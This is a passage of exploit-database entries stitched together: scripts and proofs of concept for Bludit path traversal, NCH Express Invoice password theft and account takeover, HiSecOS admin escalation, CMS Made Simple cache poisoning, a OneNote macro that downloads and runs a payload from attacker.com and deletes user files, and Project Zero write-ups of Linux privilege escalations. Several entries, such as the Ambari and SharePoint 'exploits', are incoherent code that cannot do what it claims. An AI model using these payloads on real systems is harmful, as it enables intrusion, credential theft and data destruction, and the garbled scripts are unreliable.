response = session.post(download_url, cookies=session_cookies, data=download_data)
# Save the downloaded file to disk
with open(file_path, "wb") as f:
f.write(response.content)
# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
Microsoft
Apache Ambari
Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408
import requests
# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
# Define a function to validate the headers
def validate_headers(headers):
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
return False
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
return False
return True
# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
if not validate_headers(headers):
print("Invalid headers")
return
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Call the send_request function with the URL and headers
send_request(url, headers)
=============================================
Web Server Cache Poisoning in CMS Made Simple
=============================================
CVE-2016-2784
Product Description
===================
CMS Made Simple is a great tool with many plugins to publish content on the Web. It aims to
be simple to use by end users and to provide a secure and robust website.
Website: http://www.cmsmadesimple.org/
Description
===========
A remote unauthenticated attacker can insert malicious content in a CMS Made Simple
installation by poisoning the web server cache when Smarty Cache is activated by modifying
the Host HTTP Header in his request.
The vulnerability can be triggered only if the Host header is not part of the web server
routing process (e.g. if several domains are served by the same web server).
This can lead to phishing attacks because of the modification of the site's links,
defacement or Cross-Site-Scripting attacks by a lack of filtering of HTML entities in
$_SERVER variable.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-20
**CVSS Base score**: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
----------------
Proof of Concept
----------------
Request that shows improper HTML entities filtering and will insert
' onload='javacript:alert(Xss) in the pages :
GET / HTTP/1.1
Host: ' onload='javascrscript:ipt:alert(Xss)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Request that changes the root domain for all links and allows to redirect to external
websites :
GET / HTTP/1.1
Host: www.malicious.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Solution
========
Use the variable $_SERVER['SERVER_NAME'] instead of the variable $_SERVER['HTTP_HOST']
given that the server name is correctly defined or use an application specific
constant.
Fixes
=====
Upgrade to CMS Made Simple 2.1.3 or 1.12.2.
See http://www.cmsmadesimple.org/2016/03/Announcing-CMSMS-1-12-2-kolonia and
http://www.cmsmadesimple.org/2016/04/Announcing-CMSMS-2-1-3-Black-Point for upgrade
instructions.
Mitigation : disable Smarty caching in the admin panel.
Affected Versions
=================
CMS Made Simple < 2.1.3 and < 1.12.2
Vulnerability Disclosure Timeline
=================================
02-24-2016: Vendor contacted
02-24-2016: Vulnerability confirmed by the vendor
03-01-2016: CVE identifier assigned
03-28-2016 & 04-16-2016: Vendor patch release
05-03-2016: Public Disclosure
Credits
=======
* Mickaël Walter, I-Tracing (lab -at- i-tracing -dot- com)
Website: http://www.i-tracing.com/
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288
#include <windows.h>
#include <stdio.h>
// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";
// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";
// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";
// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";
int main()
{
HANDLE file;
DWORD bytes_written;
char file_contents[1024];
// Create the fake file contents
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");
// Write the fake file to disk
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating fake file: %d\n", GetLastError());
return 1;
}
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
{
printf("Error writing fake file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);
// Send a request to the vulnerable SharePoint server to download the file
sprintf(file_contents, "%s%s", server_url, file_name);
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating vulnerable file: %d\n", GetLastError());
return 1;
}
if (!InternetReadFileUrl(file_contents, file))
{
printf("Error downloading vulnerable file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);
// Replace the vulnerable file with the fake file
if (!DeleteFile(file_name))
{
printf("Error deleting vulnerable file: %d\n", GetLastError());
return 1;
}
if (!MoveFile(fake_file_name, file_name))
{
printf("Error replacing vulnerable file: %d\n", GetLastError());
return 1;
}
// Send a request to the vulnerable SharePoint server to trigger the vulnerability
sprintf(file_contents, "%s%s", server_url, file_name);
if (!InternetReadFileUrl(file_contents, NULL))
{
printf("Error triggering vulnerability: %d\n", GetLastError());
return 1;
}
// Print a message indicating that the vulnerability has been exploited
printf("Vulnerability exploited successfully.\n");
return 0;
}
BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
HINTERNET internet, connection, request;
DWORD bytes_read;
char buffer[1024];
// Open an Internet connection
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (internet == NULL)
{
return FALSE;
}
// Connect to the server
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (connection == NULL)
{
InternetCloseHandle(internet);
return FALSE;
}
// Send the HTTP request
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
if (request == NULL)
{
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
// Read the response data
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
{
if (file != NULL)
{
// Write the data to disk
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
}
}
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return TRUE;
}
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293
#include <windows.h>
#include <stdio.h>
// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";
// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";
// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003
// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000
int main()
{
HANDLE device;
DWORD bytes_returned;
char input_buffer[IOCTL_BUFFER_SIZE];
char output_buffer[IOCTL_BUFFER_SIZE];
// Load the vulnerable driver
if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
{
printf("Error loading vulnerable driver: %d\n", GetLastError());
return 1;
}
// Open the vulnerable driver device
device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (device == INVALID_HANDLE_VALUE)
{
printf("Error opening vulnerable driver device: %d\n", GetLastError());
return 1;
}
// Fill the input buffer with data to trigger the vulnerability
memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
// Send the IOCTL to trigger the vulnerability
if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
{
printf("Error sending IOCTL: %d\n", GetLastError());
return 1;
}
// Print the output buffer contents
printf("Output buffer:\n%s\n", output_buffer);
// Unload the vulnerable driver
if (!UnloadDriver("\\Driver\\VulnDriver"))
{
printf("Error unloading vulnerable driver: %d\n", GetLastError());
return 1;
}
// Close the vulnerable driver device
CloseHandle(device);
return 0;
}
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
SC_HANDLE sc_manager, service;
DWORD error;
// Open the Service Control Manager
sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (sc_manager == NULL)
{
return FALSE;
}
// Create the service
service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
if (service == NULL)
{
error = GetLastError();
if (error == ERROR_SERVICE_EXISTS)
{
// The service already exists, so open it instead
service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
if (service == NULL)
{
CloseServiceHandle(sc_manager);
return FALSE;
}
}
else
{
CloseServiceHandle(sc_manager);
return FALSE;
}
}
// Start the service
if (!StartService(service, 0, NULL))
{
error = GetLastError();
if (error != ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
}
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return TRUE;
}
BOOL UnloadDriver(LPCTSTR service_name)
{
SC_HANDLE sc_manager, service;
SERVICE_STATUS status;
DWORD error;
// Open the Service Control Manager
sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (sc_manager == NULL)
{
return FALSE;
}
// Open the service
service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
if (service == NULL)
{
CloseServiceHandle(sc_manager);
return FALSE;
}
// Stop the service
if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
{
error = GetLastError();
if (error != ERROR_SERVICE_NOT_ACTIVE)
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
}
// Delete the service
if (!DeleteService(service))
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return TRUE;
}
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834
Description:
Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.
Steps to reproduce:
1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory.
2. Browse to the "/file" directory and database entry folders configured
3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover
# Google Dork:: intitle:ExpressInvoice - Login
# Date: 07/Apr/2020
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://www.nchsoftware.com/
# Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe
# Version: NCH Express Invoice 8.24 and before
# CVE Number : CVE-2020-11560
# CVSS: 7.8 (High)
# Reference: https://cvewalkthrough.com/cve-2020-11560/
# Vulnerability Description:
# Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format
#Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts”
import os
import urllib.parse
# Enable ANSI escape sequences for colors on Windows
if os.name == 'nt':
os.system('')
# Function to decode URL encoding
def decode_url(url):
decoded_url = urllib.parse.unquote(url)
return decoded_url
# Function to list files and display as numeric list
def list_files(file_list):
for i, file in enumerate(file_list, start=1):
# Omit the part of the file name after %40
username = file.split("%40")[0]
print(f"{i}. {username}")
# Main program
print("\033[93mDisclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m")
agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m")
if agreement != '1':
print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m")
exit()
nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m")
if nch_version == '1':
file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
else:
file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts"
file_list = os.listdir(file_directory)
print("\033[94mUser Accounts:\033[0m")
list_files(file_list)
selected_file = input("\033[94mSelect the file number for the user: \033[0m")
selected_file = int(selected_file) - 1
file_path = os.path.join(file_directory, file_list[selected_file])
with open(file_path, 'r') as file:
contents = file.read()
print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m")
exploit_option = input("\n\033[94mSelect the exploit option: "
"\n1. Display User Passwords "
"\n2. Account Takeover Using Password Replace "
"\n3. User Privilege Escalation\nOption: \033[0m")
# Exploit actions
if exploit_option == "1":
decoded_contents = decode_url(contents)
print("\033[91mPlease find the password in the below string:\033[0m")
print(decoded_contents)
elif exploit_option == "2":
new_password = input("\033[92mEnter the new password: \033[0m")
current_password = contents.split("Password=")[1].split("&")[0]
replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}")
print("\033[92mSelected user's password changed to: Your password\033[0m")
print(replaced_contents)
with open(file_path, 'w') as file:
file.write(replaced_contents)
elif exploit_option == "3":
replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1")
print("\033[92mUser is now an Administrator.\033[0m")
print(replaced_contents)
with open(file_path, 'w') as file:
file.write(replaced_contents)
else:
print("\033[91mInvalid exploit option. Exiting the program.\033[0m")
exit()
print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m")
input("\033[91mPress enter to exit.\033[0m")
# -*- coding: utf-8 -*-
#/usr/bin/env python
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14
import requests
import argparse
from bs4 import BeautifulSoup #pip3 install beautifulsoup4
def main():
parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
parser.add_argument('-x', '--url', type=str, required=True)
parser.add_argument('-u', '--user', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
parser.add_argument('-f', '--file', type=str, required=True)
args = parser.parse_args()
print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
exploit(args)
def exploit(args):
s2 = requests.Session()
url = args.url.rstrip("/")
#get csrf token
r = s2.get(url+'/admin/')
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'tokenCSRF'})['value']
#login
body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}
r = s2.post(url+'/admin/', data=body, allow_redirects=False)
if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):
print("[*] Login OK")
else:
print("[*] Login Failed")
exit(1)
#arbitrary download
r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)
if(r.status_code==200 and len(r.content)>0):
print("[*] File:")
print(r.text)
else:
print("[*] Exploit Failed")
exit(1)
if __name__ == '__main__':
main()
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub
```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spend:
01:15:00
--
# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
# Date: 21.06.2023
# Exploit Author: dreizehnutters
# Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016
# Version: HiSecOS-04.0.01 or lower
# Tested on: HiSecOS-04.0.01
# CVE: BSECV-2021-07
#!/bin/bash
if [[ $# -lt 3 ]]; then
echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
exit 1
fi
target="$1"
user="$2"
pass="$3"
# Craft basic header
auth=$(echo -ne "$user:$pass" | base64)
# Convert to ASCII hex
blob=$(printf "$user" | xxd -ps -c 1)
# Generate XML payload ('15' -> admin role)
gen_payload() {
cat <<EOF
<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
<mibOperation xmlns="urn:x-mops:1.0">
<edit-config>
<MIBData>
<MIB name="HM2-USERMGMT-MIB">
<Node name="hm2UserConfigEntry">
<Index>
<Attribute name="hm2UserName">$blob</Attribute>
</Index>
<Set name="hm2UserAccessRole">15</Set>
</Node>
</MIB>
</MIBData>
</edit-config>
</mibOperation>
</rpc>
EOF
}
curl -i -s -k -X POST \
-H "content-type: application/xml" \
-H "authorization: Basic ${auth}" \
--data-binary "$(gen_payload)" \
"https://${target}/mops_data"
echo "[*] $user is now an admin"
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=817
Fuzzing packed executables with McAfee's LiveSafe 14.0 on Windows found a signedness error parsing sections and relocations. The attached fuzzed testcase demonstrates this and causes a crash in mscan64a.dll. I verified that this crash reproduces on Linux and Windows, all version of McAfee appear to be affected including the embedded version and the SDK.
Naturally, this code runs as SYSTEM on Windows, with no sandboxing and is used to parse untrusted remote input.
0:045> .lastevent
Last event: d34.13a4: Access violation - code c0000005 (first chance)
debugger time: Tue Apr 5 15:02:40.009 2016 (UTC - 7:00)
0:045> r
rax=00000000306f1000 rbx=00000000306f1000 rcx=00000000ffffffff
rdx=00000001031d114f rsi=00000000031d1150 rdi=00000000306f4000
rip=00000000711a36fa rsp=00000000064748a0 rbp=00000000031ca880
r8=00000000000005d3 r9=00000000306f0fff r10=8d00008661e82404
r11=0000000000000000 r12=00000000306f4000 r13=000000000647917c
r14=000000001070c1b8 r15=00000000031ca698
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
mscan64a!RetrieveSingleExtensionList+0x19844a:
00000000`711a36fa 0fb64a01 movzx ecx,byte ptr [rdx+1] ds:00000001`031d1150=??
Okay, what happened there?
0:007> ub
mscan64a!RetrieveSingleExtensionList+0x198437:
00000000`71fd36e7 8b45c8 mov eax,dword ptr [rbp-38h]
00000000`71fd36ea 8b08 mov ecx,dword ptr [rax]
00000000`71fd36ec 8d4101 lea eax,[rcx+1]
00000000`71fd36ef 3bc7 cmp eax,edi
00000000`71fd36f1 7332 jae mscan64a!RetrieveSingleExtensionList+0x198475 (00000000`71fd3725)
00000000`71fd36f3 2bcb sub ecx,ebx
00000000`71fd36f5 8bd1 mov edx,ecx
00000000`71fd36f7 4803d6 add rdx,rsi
0:007> dd @rbp-38 L1
00000000`0c529018 0c52d7ac
0:007> dd 0c52d7ac L1
00000000`0c52d7ac 90000fff
So it looks like that calculation is used as an index into @rsi, which is obviously going to be oob.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39770.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=807
A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs.
perf_event_open() associates with a task as follows:
SYSCALL_DEFINE5(perf_event_open,
struct perf_event_attr __user *, attr_uptr,
pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
[...]
struct task_struct *task = NULL;
[...]
if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
task = find_lively_task_by_vpid(pid);
if (IS_ERR(task)) {
err = PTR_ERR(task);
goto err_group_fd;
}
}
[...]
event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
NULL, NULL, cgroup_fd);
[...]
}
In find_lively_task_by_vpid():
static struct task_struct *
find_lively_task_by_vpid(pid_t vpid)
{
struct task_struct *task;
int err;
rcu_read_lock();
if (!vpid)
task = current;
else
task = find_task_by_vpid(vpid);
if (task)
get_task_struct(task);
rcu_read_unlock();
if (!task)
return ERR_PTR(-ESRCH);
/* Reuse ptrace permission checks for now. */
err = -EACCES;
if (!ptrace_may_access(task, PTRACE_MODE_READ_REALCREDS))
goto errout;
return task;
errout:
[...]
}
Because no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it is possible for the specified target task to perform an execve() syscall with setuid execution before perf_event_alloc() actually attaches to it, allowing an attacker to bypass the ptrace_may_access() check and the perf_event_exit_task(current) call that is performed in install_exec_creds() during privileged execve() calls.
The ability to observe the execution of setuid executables using performance event monitoring can be used to leak interesting data by setting up sampling breakpoint events (PERF_TYPE_BREAKPOINT) that report userspace register contents (PERF_SAMPLE_REGS_USER) to the tracer. For example, __memcpy_sse2() in Ubuntu's eglibc-2.19 will copy small amounts of data (below 1024 bytes) by moving them through the registers RAX, R8, R9 and R10, whose contents are exposed by PERF_SAMPLE_REGS_USER. An attacker who can bypass userland ASLR (e.g. by bruteforcing the ASLR base address of the heap, which seems to only have ~16 bits of randomness on x86-64) can e.g. use this to dump the contents of /etc/shadow through /bin/su.
(The setting of the kernel.perf_event_paranoid sysctl has no impact on the ability of an attacker to leak secrets from userland processes using this issue.)
simple_poc.tar contains a simple PoC for 64bit that only demonstrates the basic issue by leaking the result of a getpid() call from a setuid executable:
$ ./test
too early
$ ./test
data_head is at 18
RAX: 9559
(If this seems to not be working, try running "while true; do ./test; done | grep -v --line-buffered 'too early'" loops in multiple terminal windows.)
shadow_poc.tar contains a poc which leaks 32 bytes of the user's entry in /etc/shadow on a Ubuntu 14.04.3 desktop VM if ASLR has been disabled (by writing a zero to /proc/sys/kernel/randomize_va_space as root)
$ ./test
data_head is at 1080
got data: hi-autoipd:*:16848:0:99999:7:::
got data: -dispatcher:!:16848:0:99999:7:::
got data: $6$78m54P0T$WY0A/Qob/Ith0q2MzmdS
$ sudo grep user /etc/shadow
user:$6$78m54P0T$WY0A/Qob/Ith0q2MzmdSSj3jmNG117JSRJwD7qvGEUdimyTjgFpJkTNf3kyy4O31cJSBDo00b2JIQTiHhq.hu.:16911:0:99999:7:::
(If it doesn't immediately work, it might need to be re-run a few times.)
The current PoC code isn't very good at hitting the race condition, and with ASLR enabled, dumping hashes from shadow would likely take days. With a more optimized attack, it might be possible to dump password hashes in significantly less time.
Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=79c9ce57eb2d5f1497546a3946b4ae21b6fdc438
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39771.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;
for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
[checks for bad instructions]
f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}
[...]
}
}
[...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}
return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : RPCScan v2.03 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/rpcscan.aspx#
# Tested Version : 2.03
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python RPCScan-BoF.py
# 2.- Open RPCScan-BoF.txt and copy content to clipboard
# 3.- Open RPCScan2.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
